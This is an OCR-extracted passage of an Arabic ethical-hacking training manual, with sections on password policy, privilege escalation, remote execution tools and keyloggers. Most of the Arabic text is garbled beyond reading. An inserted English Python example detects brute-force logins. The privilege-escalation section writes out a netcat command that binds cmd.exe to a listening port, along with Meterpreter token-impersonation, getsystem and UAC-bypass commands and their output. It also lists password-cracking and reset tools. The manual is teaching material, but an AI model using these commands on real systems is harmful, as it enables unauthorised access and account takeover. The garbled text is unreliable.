jJal ^ a t . n Vl j-a .<! > n j ^AjL^aJ jl j^-oJ j^ J t4 qjT > ^> JjuJI lij .^^L ^cJ jxi Jc (Jj^aj^J (^^i^ J L_flj^.VI j-a 4 alL^ ^ 

I^Vl^ ^aA j JJJ* *LaK jj > u£j AjJa ciLuoij jC ^laJl Jc til^cLoaJ ^^jJl Jjjlall (J^-J ^1L& 4 jjjxJl *Lol£ JJ > m£j 

(Jj-o liL 4_j^aljkJl CjLi jJjlaJI Jl (J jj^a jll J^l nil ^xujjJ )1a j) dli^ 4(J^^ uj £xi 

ft^lc j > gajkj ^^jll CjLi jIslaIIj CjLLjII £^^J ^ > J -0 

t lLLjj 4^^jjoia3! j^ ^ AjLjILq ^.Ij jI t jjjaII jjjju ^.LjI jjj>Ji ^uJS (jjoij ^ i^jLujj V -2 

# jjjxJI cjLa^a ^jjj j •^j^j ^^-Sc o^cLoiaI] (jLiVl (J^^ jj£ aj -3 

jxilill l^Jc JJ^xJl JJJ - ^^ ( & ^ » I^JLujJ V -4 

.^jVL^jI L_flJXjJa3l jJfljoijll dili CIjV j^ JJ J^>J^ J ^-^al jJl (J^»i^ J^ JJ ^A^LujJ V -5 

30 l£ «cjji tSlli ^ (password change policy)jj>^^ '6 

(JjjJajxJJ jj jJJ^ll CjliLo JiL<i (j^Lil l^JJ j^J ^aJ ^^jll JjuJI Cjl ^jV (JjxijJa-a JJC. jl^-o ^ JJ^>^^ ^ ^ U^3^ ( ♦ "7 
^ISjVlj Sjjxj^IIj 6jJJ^3l L_flj^.Vl ^tJ jxi USjj lija. Jjujc ^^jjI 4_ijLiJ ^I^JjujL JjuJI t & jjy^kj L-Jxj gall ^j>i J*^- -9 

_cjL^gil L^c j^a^. LiK ; jjjaII ^jisu ^l^jl LiK .t^-iiA^j l-jxj aj "LjS ( J <^ . jj-^^j 
jli SjSlill ^ jjoJI CjUK (jjj^j lij .o-^j^^ ^Lill jl ftjStil! jj><^ djUK ojj^j ^ jSj V Cjlinlajl) ^ ^L-10 

-( _3Jjiaj3l ^I^JjojI ^ ^3 jl^. M*i <aJ ^1x^.1^13 <Jjou3L AjLil lS^-^^ L>^ JJ^>^^ Aijx-<i ^j^-aJj ,l^jajjaj (j^-ftJ ( - ^ ^ 

JlkjV 11a ^^iklujj djj^ .ojjiJjj JjS jjj-o ^-aK ^ (prefix or suffix) j'^j' J (salt) j^- ^1,^ unl -1 1 
u^U-^ jjc- 1> aAS t^l jaVl ( fllik^ salt u' ^ .memorization j pre-computation 

bit salt ~ laJLujj o^lc jjj^jjjj a Aiaji . jjj>Jl <-<J£ <J£ j>i s jjjobQ <jkjaij (Jjl^JI 
cjLLaiaJ jjja31 djU jlxxi jj j^i ^jj .SAM ^jIjj s^cli ^LL^ j jji^ ajjS jjja ^ SYSKEY j^-^-12 
Jj J jj^a jll SAM s^clS ^I^jjojI jjjxJ! jj.u£j ^LjjU J^JI .SAM ^^U? ^^clS ^ jj^>ikl^l 
ajL^JI jajj SYSKEY .Sjj^l ^ SYSKEY 'CjVUJ! Jla L-iba3 Jil .jj^^ikl^l CjLL^J cjUK 
jjLujjH cjLjjj ^I^VimL jjjaJI <>iK jj > a£j SA1VI L - J ^^ J J <j j^xJI ^1 6 ^^jjoiaII l-jL <>iK CjLi jl»^13 

.SjLuLq jjc. CjLi SjLuIaSI JJ^)-^^ CljLi jlst-<i Jjuj£ CjI^I j^.! iljkjl 4-Jjt > ^-i JJ^I '"'J^ .AjjUI 

lil L fljll jl jJ^. ^jojI jl Jilall jl 6^!)Lia3I ^JjL (JIa tiL <j^aLaJl JjuJI CjLiKj A-L> uJl CjLi jIslaII l^jl ^ I^JLujJ V -13 

.CjIaKI! tSllS Jjo£ cilia ^JJjS f& jjill jjjLII 1^ J^-uill t£>^A JjuoII dil dl£ (JiLa a, W'utn 

j-<i ^cjll Jc . jjyi^kiauill CjLLu^. Jc (Brute Force attack) ^-^LJI s jail CjL^a jc c L^ll ^Lkll Cj^^joj <jaljxi-i4 

jL^i J£ £A j! t - 1J^ _ L_JJ jl! ^a^ljk (J^JOJ AjL-aj J^jk jxi > >1J IAAj^J (j^-<iJ (j^l J tl^iUj] L-JJU ^lj 6^-^.>.>lLJ| 6 jfill CjLl^A jl 

-t *L ^UJI c_jjj3I ^Lk Cj^U^ ^ HTTP 401 status code ^ 4<l^la Jj^j 
jajj 11a .password throttling cr^j 3 ^ > ^ jjj^II 4_*1£ cj! n^fl t j^ 1^ jjj^ ^ jxjII l^Lu^JI J^-15 

. jj-A^jll j ^jjujlxll 6 jill CjLiaA AjJa AjLa^JI 
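Items 14 and 15 above recommend watching for brute-force attempts (the HTTP 401 pattern) and throttling repeated password failures. The following added example (not part of the original manual) implements the detection half over web-server access-log lines: it counts 401 responses per client inside a sliding time window and flags clients that exceed a threshold. The log lines, addresses and thresholds are constructed for the example; the same per-client counter is what a throttling rule would key on.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined-log style line: client, timestamp, request, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)

# Constructed sample: one client hammering the login endpoint with a script,
# one legitimate user who mistypes once and then succeeds.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Apr/2014:20:59:01 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
203.0.113.7 - - [26/Apr/2014:20:59:03 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
203.0.113.7 - - [26/Apr/2014:20:59:05 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
198.51.100.4 - - [26/Apr/2014:20:59:06 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Apr/2014:20:59:08 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
203.0.113.7 - - [26/Apr/2014:20:59:10 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
198.51.100.4 - - [26/Apr/2014:20:59:12 +0000] "POST /login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Apr/2014:20:59:13 +0000] "POST /login HTTP/1.1" 401 512 "-" "curl/7.35"
"""


def parse_line(line):
    """Return (client_ip, timestamp, status) or None for lines that do not parse."""
    match = LOG_RE.match(line)
    if not match:
        return None
    stamp = datetime.strptime(match.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return match.group("ip"), stamp, int(match.group("status"))


def find_bruteforce_sources(log_text, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> largest number of 401 responses it received inside any
    sliding window of the given length, for clients at or above threshold."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed and parsed[2] == 401:
            failures[parsed[0]].append(parsed[1])

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end, stamp in enumerate(times):
            while stamp - times[start] > window:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    print(find_bruteforce_sources(SAMPLE_LOG))   # {'203.0.113.7': 6}
```

The sliding window matters: a fixed per-minute bucket lets a slow attacker straddle the boundary, while the window here reports the densest run of failures wherever it falls. Feeding the flagged count into the login handler (delay or temporary lockout per source and per account) is the throttling that item 15 describes.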
Implement and Enforce A Strong Security Policy 4^1*1 a^J^m o^jSj iA2 

m (j*i\ 4_uiLiui AjflJJ j (JIaJI A^JjuJI (j-al 6^Uj j^J J jVl 6 jjn^ll .4£jjuJI ^ dlLa jlx-<Jl j^l t ^ a (j-a ^1 (j-a (jlaljjcl ^I^JjojI ^laL^G 

^j^LJ a£jjoJI j j^a. ^fl ^jjSjLt.a<Jl ^1 tiL ^aL^JI (j^ila ^<J1 ^-ia^J ia^a ^jjjJ <J j^jj jjoj I^jV AjUlU ^H*' AjojLluJ ^jLuJI ^jqV^l 

_A-lA3t <J1 4_iL<iVI (J jj^aVl A_jL<^. La AjIIaj Ljajl jfLj i o j 



[Figure: sample "Permanent Account Lockout / Employee Privilege Abuse" form from a written security policy. Fields: Employee Name, Employee ID, Employee Address, Employee SSN, Employee Designation, Department, Manager Name, Termination Effective Date, Notice Period, Confirmation (Y/N), Severance (Y/N), Termination Reason. Checklist of reasons: Opening unsolicited e-mail; Sending spam; Port scanning; Attempted unauthorised access; Surfing porn; Possession of hacking tools; Refusal to abide by security policy; Sending unsolicited e-mail; Allowing kids to use company computer; Disabling virus scanner; Running P2P file sharing; Unauthorized file/web serving; Annoying the System Admin.] 
5.4 Escalating Privileges 



jj^JI CjLaK ^AaJlujj 4<i^.j-<Jl .<jj^ajall ^Uaj ^ ajjIjII <L^.^<JI (Escalating privileges) ^ jb^*^ ^3* > ^ 



Privilege Escalation 

l_j jjc S^liluiVI cJ^-^- ^ ^Jaiij^Jl Cljlknialillj CjUUJIj CjI^jjoJI <J jll L-b uj^j g all tdil jLiLdVI - ^ ^ 

^.I^aII <jl£ b] ( JUaII cJ^f^ (^c- . (Admin account) J jj jaj - < ^^ <-jLju^ Ji* ^Jc-i cjI jUlol ^.v^nm l-jLo^. m* > alll 
'yi.^lnL ^U^l Cj! jUlo! CjI jUul \it > n\\ ERunAs2X.exe sbi <u£«j 4 WZK SPl^ <J\ Jj^jJI 
jj^j <u£*j tdjULJI cJi^j t^Jj^udj CjUjkJI a! jjuj ^.1^11 jSaj cjljliLiVI "nc.exe -I -p 50000 -d -e cmd.exe 

. (Horizontal privilege escalation)^^ £i\JJlLa\ ^ > (vertical privilege escalation) gr^'j ^IjLu^l ^ > ^ .(jJ^ 
L_fljl!aj3lj ^jl^JI J^x^jll <j ^ j^JI jj^ ^ ^" ,, i^ t Jjl^j : (Horizontal yrivilese escalation)<J& CjIJUIaI jj^gj 



^^kl^ll t^jUajllj j J! Jj^jll <j ^ j^ixi jjiJI ^ ^IjlaI I JjUj ; (vertical yrivilese escalationSi^j CjI Jbl^l Jj» 

.(Administrative functions) cjljlnJ ^ 



[Figure: privilege-escalation diagram. An attacker holding a normal user account says: "I can access the network using John's user account but I need 'Admin' privileges?" (User -> Attacker).] 



Privilege Escalation Tool: Active@ Password Changer 

http://www.password-changer.com : j^-a^ll 
^^klai^ll jjj* CjIaK j aII J jjjoiaII ^bjloal jl *Lij] Sjlcb pi jjoj jjuJ! o^UiuiV ftbl ^ Active@Password Changer 
Features 

Recovers passwords from multiple partitions and hard disk drives 

Detects and displays all Microsoft Security Databases (SAM) 

Displays full account information for any local user 

[Screenshot: Active@ Password Changer "User List" dialog for an NTFS partition, listing local accounts with descriptions, e.g. Administrator (Built-in account for administering the computer) and Guest (Built-in account for guest access); remaining entries unreadable in extraction.] 

(J jj^a j3! Asu 6 La j-oC- .(jl^Vl tilil jLiLdl li* - aJJ ^ jSJ ^j) ^-xJl ;4_i^jJa3l jj jiis&l] jtg-^. (J Jj^a j3l (j-a du£ aJ A3 QJ^J (ji A*-J 
L-jLua^ j& Ua^A (jj^J 6<il3i j jJJ^ll ^Vim^ <jJaikl<i CjI jtiLal Aj^I ^Aaajau> ( t it > <J jj^ jll tilLaJ ciljli jl^-aJi ^1 

. (impersonation tokens) J^VI jj* j fl^^iuL ^ jL\ ^lui* JUl>l ^J*3j jju> ^ y±l\ ^ 

CjI jLiLdVlj 6^^jjoia13 cjIc ja^JIj ^Ld^jjauJ! ^AaJ ( - <J j^-^ l},^ ' ^ a uilaJ 4_ii<»VI CjU» jIslxJI ^^Ic j^^ (Tokens) jj-*^ 
jj^j _aSj1 > ^i^I a y >i\^ ^3?^ (access token)(J j^^j ^ Oj-^j <^ a ikii* ^ J j^ > ^ ^jc. a ikiL 

' (system accouni)^^ c_jLai^ . j±\ ^Vi»^ JU^jl (jjjia lij^ cj! jliLil \i* > ^ U3 ^^£5 (impersonation tokens) J^>V! 

<J jj^ jll (Jj^- £^J^ L_kstjJa3l li^ ^Aa^LujJ 

t> .Meterpreter ^ J j^^^ c> (impersonation tokens) J^VI J>« j cJLS£U jVI l^j 

.ILLaj Uij^j U£ Meterpreter J j > ^N J^-l c> ^ \u>\*\ \ 4^.1^3 Metasploit ^l^i^l 

:Meterpreter c> j ^VIS armitage ^^i^j ^ j^ ^Vl J^-^ 



[Screenshot: Armitage (menu: Armitage, View, Hosts, Attacks, Workspaces) with the auxiliary / exploit / payload / post module tree, a compromised host 192.168.1.105 shown as NT AUTHORITY\SYSTEM @ TEBA-293DD90F08, and Console, Hail Mary and Meterpreter 1 tabs.] 



use incognito a^UL JjjL incognito ^ J^k <> lD^VI <^ Meterpreter i> 
ic^VlS incognito c£*t cAA<^y\ a^jJ help j^VI 4^Lk> pjb ^ Meterpreter ii£5 



meterpreter > use incognito 

Loading extension incognito. . .success. 

meterpreter > help 



incognito 4-* * 1 ^ ^ ^ CjI^LoiaII \ La^j La (j^j CjI^cLoixJI ^jaslSI ^^^U ^juj 

help <^LL ^ 



Incognito Commands 

Command             Description 

add_group_user      Attempt to add a user to a global group with all tokens 

add_localgroup_user Attempt to add a user to a local group with all tokens 

add_user            Attempt to add a user with all tokens 

impersonate_token   Impersonate specified token 

list_tokens         List tokens available under current user context 

snarf_hashes        Snarf challenge/response hashes for every token 



^Yl^-u) ^ list_tokens j-Vl ij4±j J^U <> t*Ui J*i> ^ j .s j^Vl <j jVI ^ ^U^l 



meterpreter > list_tokens -u 

Delegation Tokens Available 

NT AUTHORITY\LOCAL SERVICE 
NT AUTHORITY\NETWORK SERVICE 
NT AUTHORITY\SYSTEM 
TEBA-293DD90F08\JANA 

Impersonation Tokens Available 

NT AUTHORITY\ANONYMOUS LOGON 



^jujI] impersonate token ^I^jLuAj aJUII ^U^l ^Uj J!>tk ^ t^lli j & JLaJijVl ^ Jj.-kJulj ^ jij ^aJUII s jlaaJl 

impersonate_token TEBA-293DD90F08\\JANA 

meterpreter > impersonate_token TEBA-293DD90F08\\JANA 
[+] Delegation token available 

[+] Successfully impersonated user TEBA-293DD90F08\JANA 
meterpreter > 



. J^j gJUJ! ^Ikill ^^kludj jVI L^jl lij 

^jjL Meterpreter c> j system ^ v^^ l JU^jl (j&j^ cjU^X^I! jl ^ j^J <ajjia ^jj LjsjI 

_4jt-o — h jLi^Jt ^\ ; AjljLik ^-i^ <3jj^ Liajl getsystem ,>*VI <cLla 



JjiiJjj ^ o^ii jl bypassuac d^*-^ 6 C5^^^ cjI jl^j^aVI jl 7 jj^j JW> J j^^ J 
iaj|^)3l djUi jlx-<J! ^3^(UAC) ^^jLluaII l-jL ^ dia jjoajj^jUi jjLaaj <>— .getsystem j-**^ 

http://windows.microsQftXQm/en-us/windows7/products/^^ ic^^' 

:Meterpreter ^ yr^ ^ ^^j^^ ^I^IujIj I^a J^-*^ ^jjj 

run post/windows/escalate/bypassuac 
J dj| j^I 
L-jL 



Other Privilege Escalation Tools 
jjj* djUK j Windows administrator J ^islVI jl <*o£*i <3Jljl j <jUU t*U Cj\j\JL^\ 

t ** & Aij^stxi jjisJl jl 4_Lail<Jl JjJ-<Jl (jjJ*J S^tcl (jJ^la (jc jj jj;^^ <J jj^ jll <U > nj <J jj^^J! aJ ;CjIj^VI 

Offline NT Password & Registry Editor available at http://pogostick.net 
Windows Password Reset Kit available at http://www.reset-windows-password.net 
Windows Password Recovery Tool available at http://www.windowspasswordsrecovery.com 
Elcomsoft System Recovery available at http://www.elcomsoft.com 
Trinity Rescue Kit available at http://trinityhome.org 
Windows Password Recovery Bootdisk available at http://www.rixler.com 
PasswordLastic available at http://www.passwordlastic.com 
Stellar Phoenix Password Recovery available at http://www.stellarinfo.com 
Windows Password Recovery Personal available at http://www.windows-passwordrecovery.com 
Windows Administrator Password Reset available at http://www.systoolsgroup.com 

(How to Defend Against Privilege Escalation) cj) jLIaV) ±*-*£ ^ ±± jilii 

AjjS^S CjI jLiLdl ^^>^<i jl 4j£*oA lS^I CjI jLiLal ^£J^ qAa laJLudAll (jl ^£U3l j& CjI jLiLdVI N J» - gaJ ^ AjJa S^LjaxJl ^j^iall <JjJaal 

(JJ^>1 g all (j£-<uJl 4il .CjI jLiLdVI - ^'y ^■-■(u.hj 4_^x»^)Jl ^1 j£l L_J jjisJl C-pasu t^jLi^Vl (j* ,L?-*^ <J^-^ ^Uaill ~\ iklLoiV 

# <J JJjoi-g (j-a ^.5^1 j^f^l CS"^ J J> (£ ^ .Ajjl^j JjiC. L-jL ^I^Vlmlj A^JjuJl ^1 <J jj^ jll 

•^j*^| ^IxJl jliLdVI ^ > ^il AjJa a^Lja^ll j^l^ill <J-gjuiJ 

.(Restrict the interactive logon privileges) Jj^ll £jI jl^J 
.(Run users and applications on the least privileges) cjI jli^VI JaVl ^ c^llnkill Jj^jj ^ Wmi^ t J*^ 
. (Implement multi-factor authentication and authorization) lW ijiii 
.(Run services as unprivileged accounts) J^-^JI ^I^j £jI jLjl^l c> djU^kJI J;!^ 

(Use encryption technique to protect sensitive data) ^l^JI cjUUJI ajU^J jjLSjII ^l^kl^l 

Implement a privilege separation methodology to limit the scope of programming errors and bugs 
(Reduce the amount of code that runs with particular privilege)^^ U^jili J&\ ^Ij^VI 

(Perform debugging using bounds checkers and stress tests) > ^ ^'j^j 

Test operating system and application coding errors and bugs thoroughly 

(Patch the systems regularly) ^U^U ^J^l ^ > ^ 
5.5 Executing Applications 



^iiii <J (Jj^Lg ^jjuj <^1j ,^c3l t(J jll <! j^juj Jali^ll backdoor L "\if"j ' jj^^l Jalisltj t < ** >1 j^^j ^^Uaill 

Executing Applications 

axj ^jj Executing Applications .^Uiill "^^idl" ^5-^ U j .<k ^<JI £>i& 4ln^JI CjlLfkill ^ <jiasu (j^l^l ^JL 
<j 4_^UJ! 4lniJI ^1 jJI o^ju iiiii J jL^j ^ig-J! . (administrative privileges)^u^j ^-A^^a ^1^1 c_La£&l 

;^Uai3l Jjl j-g 4_j ^j' >■* * J^*-^ <J '^4^ jj^iJl (j^^ jl Exploit C5^j C£^JH (,5-^ <*-^-* jl*-<<Jl £-<^J A-i^jJall jlg-^. Jsu 

a\u\\\ jJI 6 J j^ 3 ji^ ^-W 3 iaU^il backdoor ^u/" <screenshot ^sul\ j ^ jjjJI djUK j 

Backdoors 

jl^a jl Exploit J! Cs?^j3 CjUjkJI 4 (disrupt operation)4J*x]| jl deny J Z*** ™ c^JLiki ^ 6J Lc 

Crackers - 
Keyloggers - 

£j3U* <J a^ ja J£ cJ^SI jl£ o^^^ ^ .(software) (i^j J (hardware) uj^ ^ 

, jj jji^ll 
Spyware - 

. jj^l^SI djj^j jj*^ ^ l^ILa jjj (Capture screenshot) c> ^ (Spy software) ou^l ^1 jj 

> >~i\\ jj jjj^^l j^-^- <J j^-juj ^^-Sc iali^J] Backdoors c_ ujjjj ^jIj ^.1^31 ^jli tA-i^jjall jj jjj^ti 



Executing Applications: RemoteExec 



http://www.isdecisions.com : j^-a^ll 



^nW\ .4 ^1 > Ti\ l ^LaJl djUj^jajVI/^l jJI ^ cf 0 ^ "uj^j ^ RemoteExec 

<j^aLaJI JJ^>^ ^ ^ clA^ Cy* ^Jc-Ijui^ ^ . jjAljjll ^^^-Sc Jjsll ^5^* 'l^_kjudj Ljajlj lla allj 

D^lcl Uiajl (j^J 6<il3i AiLjaVU JJ^*^ LS^-^^ CjULoi^J! Ail^ (JjlaxJ ;Asu ^jc <Jjjjoia3! ^^JjoixJU 

c> <^ Power offj 'wake up «-^%] « 

.r'nmli 4_iLixj ^aL^Jl Wizard cJ^-^- cJJJ^^ C-ujjIj ^ jij 



;aJU3I ijiiLill ls^jj RemoteExec cij^ ji^l c> jJt J^-^ -2 
[Screenshot: RemoteExec main window (menu: File, Tools, Window, Help). Tree: RemoteExec > Remote jobs, Reporter, Scheduler, Options. Descriptions: Remote jobs: Allows you to configure, manage and execute remote jobs; Reporter: Allows you to display reports on remote executions; Scheduler: Allows you to schedule remote executions and generate automatically r... (truncated); Options: Configure RemoteExec options.] 


Remote <ija jfcM t> ^ <4j (Executing file) 3 .n > ^ l l ^U > W ^ cjj^ ^1 cjULJI -3 

;aJU3I <j^LUI cs^jj jobs 



[Screenshot: RemoteExec / Remote jobs view. Entries: New remote job (Allows you to configure and execute a new remote job); My Remote Jobs (Your favorite remote jobs); My Remote Actions (Your favorite remote actions); My Target Computers (Your favorite target computer lists).] 


\JN& new remote job J^jj ^tac-l New remote job <j> £>0^ J^h -4 



[Screenshot: RemoteExec / Remote jobs / New remote job, available action types: File execution (Execute a file remotely); Update installation (Install a Microsoft update remotely); MSI installation (Install a Windows Installer package remotely); System action (Reboot/Shutdown/Wake up a computer remotely); File Operation (Copy files or folders to remote computers); Local account maintenance (Change the local administrator password and/or disable all other local a... truncated); Popup (Display a message to the user logged on the remote computer); Multiple actions (Execute several actions in one pass).] 
Qp. Jaxj ^Ij CjI^^a^I q* ^jaxJI ajjj jSaj New Remote job ^I^VI * -5 
l^^JI J&UJI cjliukill ^ ^1 Jj«-xijj ^ill j File execution 3^1511 ^ J!^lk jU^j <— i JliaJI J^jui -6 
\<A\a1\ 3-^Ui3l ^1 j ^ ja> File execution £ j-O^ j*^' j ^ 



[Screenshot: RemoteExec > Remote jobs > New remote job > File execution. The form has the fields File, Directory and Argument(s), an Administrative option, the check boxes Wait exit, Console (Auto) and Reboot, and the buttons Launch, Launch in a new tab, Schedule, Save in My Remote Jobs, Save in My Remote Actions and Save in My Target Computers.]



4^jU3I ^ . A-iauJal l jl^ ^jjj ^ill exe File ^ File execution s-> ^aUJI 4_ajU3I ^ -7 

.auto Interactive Context j^^l c> 

:c5 jVI£ ^ ci^JI ^1 l_lu^ Jk. jU^j filter m l^ 1 ^ 11 -8 



[Screenshot: the filter section of the File execution job. Filters can be set on OS version, OS level, Service pack, Workstation, CPU type, IE version, Language and Registry value (Exists), together with the option "Don't execute again on a computer where the action was already executed".]



y&\ J^U. tillij ( jjil-iM I J^-*^ ^j^j ^^Jl Target computers m o^UJI * jaJI ^ -9 

.ei^JI JU^jj Name 





[Screenshot: the Target computers section. A Name dialog (Name, Computer, OK, Cancel) adds a computer to the Computers list, which has a Remove button.]



.^j-qjVI L_uLaJI (^ic 4_Ajli3! ^ *^ ja. Lunch c3j* q."^*^ <Jj*j^ ^ jij djbl^cVI ^-i^ a*j <jVI -10 
Executing Applications: DameWare NT Utilities 

http://www.dameware.com 
sa&Lula ,Asu ^jc a1 A\ jj jjj^ll j 6 ^ *M jj jjj^ll Sj^-^i j ^a! j^JI *O^V ^ ^-alhj Dame Ware NT ^^^>^ 

(jp, <£l^j\\ jl^J> ^alAiJLuilj Jig-ill ^A^JjuiaII <j£Luui (Ja. Jc SjAall 4ja3 Ljajl . jjAjjjll Sjbjj Asu jc JJ jJJ^I Sjg-^-l kj^j rtJ JA& 

t . ii< ^Ljoj (capture screenshot) <*-iUaa3 a^Ij tAsu jc <1 ^1 jj jjj^I Sj£j>lj ^*aI j^JI J^*^ d^IcI (j£-gj <ul£ .a*j 

Sjblj 4 Asu jc jj jJJ^SI Sj^j^I Jc CjliLJ! tilli^j ^cjoij A i£ aJ 4<c.jjaiJ Jig-ill ^A^JjuiaII t . n£ /^l ^iajuj Jc <LA£]| SjIaJjuJl A j£ aJj 

^active directory Jj^jj 




[Screenshot: DameWare NT Utilities main window showing the Browser tree (Microsoft Windows Network and the domain computers) and the Services view of a remote computer, with service names, paths and log-on accounts such as LocalSystem and NT AUTHORITY accounts.]



Keyloggers 



tic o Jlsc j& .^cjliJI ^ jl j Liajl cj^j (keystroke logging) ^1^1 iai^Ja ct^j 'Keyloggers 

t^iljjJl <Jjuij-g jl ^jjjjoi^jll L-L^L^a SjIc SAjju Clal^ Jj ^jjILJI 4.^. jL t . u^j Lo Ail^ Jib ^jIj ( - Uiajl 6 (JP> ^jUc (jj^J 

J 0^*-^ (j^^ jl jl ^jj^ ^jujLj <Jj^j jll jPhishing s^j^il <JjLujj3! CjUg jIslaII ^ j^UI ^^Vl a^JI ^jjajsu 

jj j-q CjI ^1 jl tiljj j j j-q dal Jl* l^XftxlujJ CjLq jlst-d <3 Jjoj jA Ali. jll l^iAA j l^JC ^jisLxJl jAj^xJI j-o i—jjou] l^jl ^jj^. 

t . u\ < J JiLd <JjL^jj ^jialjC-V ^aA^JjaaJ Lo Ullc. ,IaAj^j ^aJJ L^J ^ajL jl! <lLjudj| jl j^>^ uJl ^jAJ V I— 6 J A\ JlLd jA ,^j^.l 
# ClljjjjVl Jc ^Jliial <J ^ j£j La j^ (JjaII j13 (j^J l— <JjL<Jl CA ^j; Jj (jjiila j-<Jl JJ jJJ^SI 4-Ljudj| Aj^jI <jcl L gall ^<Jlj 

j jjIS jjc. cJ^*^ ^Ia^jjojI ^jj ,L_fl jj*-* jjc- lLlIIj cJjU CjLd <j£j Jc AcLaaj 4 ^jjjjud^jll ^<il jj ^ -W^j^ LiAjc 6 Keyloggers 

4^ jjj^IVI ^jJl dAijx-G A\i\\ CjLq jlx-d j-GjJaJJ .LljauJall j-o <JJjuj j A\i\\ CjLq jlx-d <3jjoj JiLd AjJJjk j^al JC- V jj^^l ^ a\\ <Jj3 j-o 
jpj LA JJC. j t^atajVl J jLdJjVl CjlaUaJj tt*J jjjll j tAjjjill JjLojjII j tJRC t^-Jj^jAll AijC. JaL^j j Ajajj^axJ! Jjj^al&ull 6 JjuJI CjLoK 
(J3 <jJajC Ljajl ;SjiLau» dljjjjVl JL^jVI JJC JijJJ jll ^1 ;CjLIjj3! ,^ajJ (JS (JjjLI! (JjS j-d I ^!Llj£ ^JJ jl! djL» jIslxJI 

.4£jJJ! jjc l^iiil U jji^j ^ jl ^jjILJI c_j jjja ^^ijj Keyloggers Keyloggers 
" drive-by " l!^^ J^U. ^ jl ^ jjj£3VI ajjJI diLaaj* J!>U. ^ ^vim^l ^Ikill Jc Keyloggers ^-o^l t — ^ ^ 
^Ikjj o j^VI ^iilLJI <^j3 jjj jllj jojuS jj ^ Keystroke logger's .£al>^l * j^j^ j^ ^iu^ l ^jL 

Keylogger Jl <-4^ 

cjUUJI Jjj^i j ^tjjlLJ! <^jl J 3 J Keyboard *lj^> Security Flaws jl*-«JI c^ill cad^' 
^3 La jjj^a J 1 . ujujj ^jl Phishing Phishing Jl c — *Oj^ a ^ j^' < s-j j^VI liA ...jj jjj^I J 

JjS (Jjls ^Uaj V tiili Keylogger ^.luiilU J tl^jjl^j* jll diijijyi jl 1 ^jIIj ~ i^Lu^l 

tiUj cJj^j o^>JI <jla Keylogger ^^1^ c^^ 3 .^jW^ J] lW-^I u - * a ^ ^ ^^^^ 4_L*c J Iajj <j| d*. ^A^iLaixJI 

£cxal jj ^jLulLg CjI (j^ J 3 L - J ^^] J] ^ > ^ CjliLo (j* jl 6L_il j <J£juij 1 ^jjaLq Aijst^ qj^ dijjljVl Jc- £yz IgJjjij <J^-^ 

^cjouj Keylogger ^ ^ ^laJI jj^>^ j ^1 JL^L ^vim^l ^jIj Lo*iic. .(Shared Files) ^ ^j^-^l 

4J1aj Keylogger 

(jjS jiJU jl (J^axJ <c.Ula (JlLo ^AkjjauJl JaU^j ^jjJJ ^jll j ^ jl! ^ 4 <JalLQ djljlia Jc^SCreeilSllOt) djUail Jalfijll -2 

,CljL<i jIslaII lA JJC. j tl(g\jir ujj ^aJ ^^jll Cjllulalll ^LgjojI toiaUll ^jjjUc <Jj^ > >n (Jj^ia (JC- (jj^ A^LolaII <Jajaij| ^JJJ ~3 

jll ^jjj^IVI aj^>^I cJ^^jj oj^Ij^II ^jjj^IVI aj^>^I cJ^^j cJ^ ^ ^ j 1 -7 



Types of Keystroke Loggers 

,4 nt a jj jjj^ ^-jjli^ <^ jj (jjj j ^1 ^A^jjauJI ^j-<i \ ^jj <iaxjja J£ (Jj-^ > >nj ^jIj ^ill j jjt > ^cxiljjj j& Keylogger 

11a j .a^jJJI jjc IgJiJ Ia jji^ ^3 u' Jaliill Jc ftj^Slt l^j^l Keylogger > j^-!l j '^^^i u^j^ j J jj^V^ 

# <J£judj 4_jik-<JI CjUi jlx-<J! Ia jjc-j phrases j^^>^ g ^ <J j^^j ^ > ".> 
^Wj^ 5^ u^VI ojiU ^^i^jj .software loggers j hardware loggers ^ .Keylogger c> 
1. Hardware Loggers 

J^^j ^ILJI Qii !>L^i* jjfL .USB j*» 6 J-F- Hardware Keyloggers 

^bjlojU ^LA^l^Jl ^aj£j ^aJ 6^ J (Jrt> ^> ^AaajoiaH <Jj3 (j-G 1 ^aJJ ^^jll 4_L^jab<Jl ^JjlLJl dAjJjJa <j£ ^jj^^J ^aJJ .USB 

PC/BIOS Embedded - 



^ <J ' (Physical and/or admin-level access)j^j£^ lsjjj^ 3 c^\^L^ jl/j Jj^jll 

cjUI^)^.! jj^j BIOS l£ j^^q <CLt!i3! ^<il^)JI <jl l_ li^ >*>n ^jj > o <jL^aLaJl s^_^U jii jjj^ll BIOS J l3.-- lSj^^ 

Keylogger Keyboard 

jli^l cs-^ j^)^ j**^ *J3 ?^ 4-i>.>uj^)3l s j^lj ^ " J l^Jj J jll (j^j <^i3l a - a II <jj£li3 ^jjILJI jl 

External Keylogger 

4_i^.j\_^J! jL£ .^tiiixi <iastjja <J£ i l^jl „ jii d^IiIslxJI jj jji^ll ^jjli.^ jl ^ij External Keyloggers 

tAi^i^j jj jl^a. l^iajj A\< , *\ . jj jl^a. ^1 ^ Jaxj j jJI ^ ^1 ^HiJ V (External Keyloggers) 

jl}^ (j-a ^1 jj) ^Hjl . ^filial 1 CjUaxjJa (Jj^la (jc tiL ^aLkll jj jJJ^ti j^-^- diUi jlx-<Jl >±>~aj 4 j£ C-U^ 
